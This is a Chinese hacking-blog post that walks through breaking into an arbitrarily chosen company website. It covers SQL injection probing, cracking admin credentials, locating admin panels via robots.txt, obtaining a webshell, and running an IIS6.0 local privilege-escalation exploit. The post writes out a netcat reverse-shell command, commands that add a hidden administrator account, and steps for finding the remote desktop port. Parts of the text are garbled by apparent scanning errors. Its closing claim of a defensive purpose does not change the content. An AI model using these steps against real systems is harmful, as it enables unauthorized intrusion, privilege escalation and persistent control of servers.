危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2306 浏览20583318

注入新玩法之提权乐翻天

已经弃“黑”从商好久了,最近一直在忙活着灯批发生意,不过我对于网络的兴趣依然很浓厚,新漏洞新ODay自然也不会放过,前些日子在黑帽上公布了一个IIS6.0的本地溢出程序,好多初学者测试都不成功,但我测试效果却挺好的,在此就把一个拿站的完整例子分享给大家。

目标是一个IT公司的网站,我从网上随手找的,打开网站随便点击一个新闻链接,可以发现其新闻发布系统格式为ASP,删除参数“smallclassname;new”并加人特殊符号“’”来测试是否存在往入漏洞,提交后页面出错了,并提示了字符串的语法错误,这表示存在注入漏洞,初步估计该网站是使用ASP+ACCESS数据库架设面成的。

把这个网址丢到啊D或明小子里,就可以顺利的猜解出管理员帐号和密码了,这些步骤对朋友们来说都是轻车熟路,我就不多作介绍了。通过注人工具得到管理帐号和密码,但是却役有找到后台的登录地址,好在网站还存在收录文件robots.txt,我尝试访问防收录文件robots.txt并手工探测常用的管理目录名称,成功的发现了管理登录地址和其它的敏感信息。

该网站有三个管理后台,一个是新闻发布系统,一个是后台管理系统,还有一个是上传管理系统。使用猜解出来管理员帐号和密码成功的登录进入新闻系统的管理界面。  

看到这儿,聪明的危险漫步粉丝们也一定已经想到了拓展思路,没错,就是使用我们在啊D中猜解出来的帐号和密码去尝试登录另外两个后台,结果正如我所预料,新闻发布系统和后台管理系统的帐号及密码都为同一个。从后台管理系统登录后可以看到服务器支持aspx,因此服务器很有可能使用的是Windows2003系统。接下来的问题就是如何得到Webshell以及提权了,像这种漏洞百出的网站拿webshell和提权应该不是很难,这里我就给大家提供一个思路。

利用新公布的Windows本地溢出程序

网站有备份功能,而且也有ewebedit,所以对于怎么拿webshell我就不再累赘了。接下来我们耍利用的是刚公布不久的IIS6.0的本地溢出程序,我总结出的一点经验如下,利用环境为Windows2003+11 S6.O+X P_c mdsh ell,利用目录为“C:\wmpub”、 “C:\RECYCLER\”、“C:1temp”,其它的目录我测试没有成功。先把我们的本地溢出文件p.e xe上传到网站的“C:hRECYCLER\”目录下,然后就可以反弹一个cmd或者直接远程执行了。

直接在webshell里执行本地溢出程序,我就反弹一个cmd再进行溢出吧,先使用NC在本地进行监听+在本地电脑执行nc -vv-1.p 51,然后在远程电脑中通过websheU执行命令nc.exe-e C:/RECYCLER/cmd.exe本机IP 51,就会在本地得到一个反弹回来的cmd,我们使用cd命令转到recycler目录,然后直接执行p.exe¨net user用户密码tadd& net LOCALGROUP administrators用户/add”来添加一个管理员帐号并为它提升权限,最后我们该如何得到对方的3 3 8 9连接端口呢?方法很简单的,只需要两条命令即可摘定。首先执行tasklist ,rsyc查找到“svchost.exe  2752  TermServ/ceTermService”,服务所对应的“PID-2152”,我们记住这个。然后再执行netstat -analfind”2152“,得到的结果为“C:\RECYCLER>rietstat -anolfind”2152’’netstat -anolfind2152"TCP0.0.0.0:8899 0.0.0.0:0LISTENING2152“,是不是很方便昵?反弹回来的的Cmd使用完毕后要记得执行exit退出哟,不然服务器上一直会有一个cmd进程的。

本文的目的是为了提醒大家,注意程序的过滤以及熟悉黑客常用的入侵方法。虽然WEB目录做了防写入和图片目录防脚本执行,但是没有注意数据库的和后台的安全。知己知彼,才能百战不殆。熟悉黑客的入侵手法,我们才能知道如何去做好安全防范工作。